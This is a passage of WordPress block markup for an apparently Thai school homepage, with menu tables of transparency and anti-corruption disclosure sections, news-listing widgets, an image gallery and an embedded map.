{\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"3\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":17},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"paginationMargin\":{\"md\":{\"bottom\":\"-40\",\"top\":\"-20\",\"right\":\"10\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"abc6c06d\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} /-->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/14sI1pHQ6FFaNHMgoK3-29HJ5-OSuA8MD/view?usp=drive_link\" data-type=\"page\" data-id=\"19\">โครงสร้าง</a></strong></td></tr><tr><td><strong>ข้อมูลผู้บริหาร</strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/drive/folders/11Vp507V33y_h7QajSRRoHnfjI314hOjC?usp=drive_link\" data-type=\"page\" data-id=\"19\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong>ข้อมูลการติดต่อ</strong></td></tr><tr><td><strong>ข่าวประชาสัมพันธ์</strong></td></tr><tr><td><strong>Q&amp;A</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</strong></td></tr><tr><td><strong>แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</strong></td></tr><tr><td><strong>รายงานผลการดำเนินงานประจำปี</strong></td></tr><tr><td><strong>คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</strong></td></tr><tr><td><strong>คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติการให้บริการ</strong></td></tr><tr><td><strong>E-Service</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></td></tr><tr><td><strong>ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการบริหารและพัฒนาทรัพยากรบุคคล</strong></td></tr><tr><td><strong>รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</strong></td></tr><tr><td><strong>ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</strong></td></tr><tr><td><strong>การขับเคลื่อนจริยธรรม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</strong></td></tr><tr><td><strong>การเปิดโอกาสให้เกิดการมีส่วนร่วม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</strong></td></tr><tr><td><strong>การสร้างวัฒนธรรม&nbsp; No Gift Policy</strong></td></tr><tr><td><strong>รายงานผลตามนโยบาย No Gift Policy</strong></td></tr><tr><td><strong>รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</strong></td></tr><tr><td><strong>การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการปฏิบัติการป้องกันการทุจริต</strong></td></tr><tr><td><strong>รายงานการดำเนินการป้องกันการทุจริตประจำปี</strong></td></tr><tr><td><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"76fbe2ef\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"19_91838d-0f\",\"columns\":[1,1,1,1,1,1],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"news\"}],\"meta-fieldsfSize\":{\"md\":11},\"headingBgColor\":\"#00000000\",\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":11},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":45},\"thumbnailHeight\":{\"md\":260},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"จดหมายข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"จดหมายประชาสัมพันธ์\",\"value\":\"%e0%b8%88%e0%b8%94%e0%b8%ab%e0%b8%a1%e0%b8%b2%e0%b8%a2%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline 